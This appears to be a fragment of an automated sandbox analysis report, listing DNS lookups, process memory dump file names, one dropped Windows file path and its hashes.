US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp

Files

memory/112-1-0x00007FFED1D8D000-0x00007FFED1D8E000-memory.dmp

memory/112-0-0x00007FFE91D70000-0x00007FFE91D80000-memory.dmp

memory/112-3-0x00007FFE91D70000-0x00007FFE91D80000-memory.dmp

memory/112-2-0x00007FFE91D70000-0x00007FFE91D80000-memory.dmp

memory/112-7-0x00007FFED1CF0000-0x00007FFED1EE5000-memory.dmp

memory/112-6-0x00007FFED1CF0000-0x00007FFED1EE5000-memory.dmp

memory/112-8-0x00007FFED1CF0000-0x00007FFED1EE5000-memory.dmp

memory/112-9-0x00007FFED1CF0000-0x00007FFED1EE5000-memory.dmp

memory/112-5-0x00007FFE91D70000-0x00007FFE91D80000-memory.dmp

memory/112-10-0x00007FFE8F440000-0x00007FFE8F450000-memory.dmp

memory/112-11-0x00007FFED1CF0000-0x00007FFED1EE5000-memory.dmp

memory/112-4-0x00007FFE91D70000-0x00007FFE91D80000-memory.dmp

memory/112-12-0x00007FFE8F440000-0x00007FFE8F450000-memory.dmp

memory/112-14-0x00007FFED1CF0000-0x00007FFED1EE5000-memory.dmp

memory/112-15-0x00007FFED1CF0000-0x00007FFED1EE5000-memory.dmp

memory/112-18-0x00007FFED1CF0000-0x00007FFED1EE5000-memory.dmp

memory/112-19-0x00007FFED1CF0000-0x00007FFED1EE5000-memory.dmp

memory/112-17-0x00007FFED1CF0000-0x00007FFED1EE5000-memory.dmp

memory/112-16-0x00007FFED1CF0000-0x00007FFED1EE5000-memory.dmp

memory/112-13-0x00007FFED1CF0000-0x00007FFED1EE5000-memory.dmp

memory/2488-37-0x00007FFED1CF0000-0x00007FFED1EE5000-memory.dmp

memory/112-43-0x00007FFED1CF0000-0x00007FFED1EE5000-memory.dmp

memory/112-44-0x00007FFED1D8D000-0x00007FFED1D8E000-memory.dmp

memory/112-45-0x00007FFED1CF0000-0x00007FFED1EE5000-memory.dmp

memory/2488-49-0x00007FFED1CF0000-0x00007FFED1EE5000-memory.dmp

memory/2488-50-0x00007FF7D2950000-0x00007FF7D2958000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 b0a211906cc3ea22cb03b173083a1658
SHA1 8b52d098dc6d460ef48a1a6249fe564f87070cda
SHA256 36278ac46e1884e67089c4189424fa93a8d673ebab644bfab4003a9937a79043
SHA512 c8d2532ce5144241efa8f6a0ee57a89f7ffc48442f2c47a036d1b9407f73b2720036f9d2ca782f1c9b03bdac5791b632e45d2a8dcaeb051ee4f7bf0f65fd6414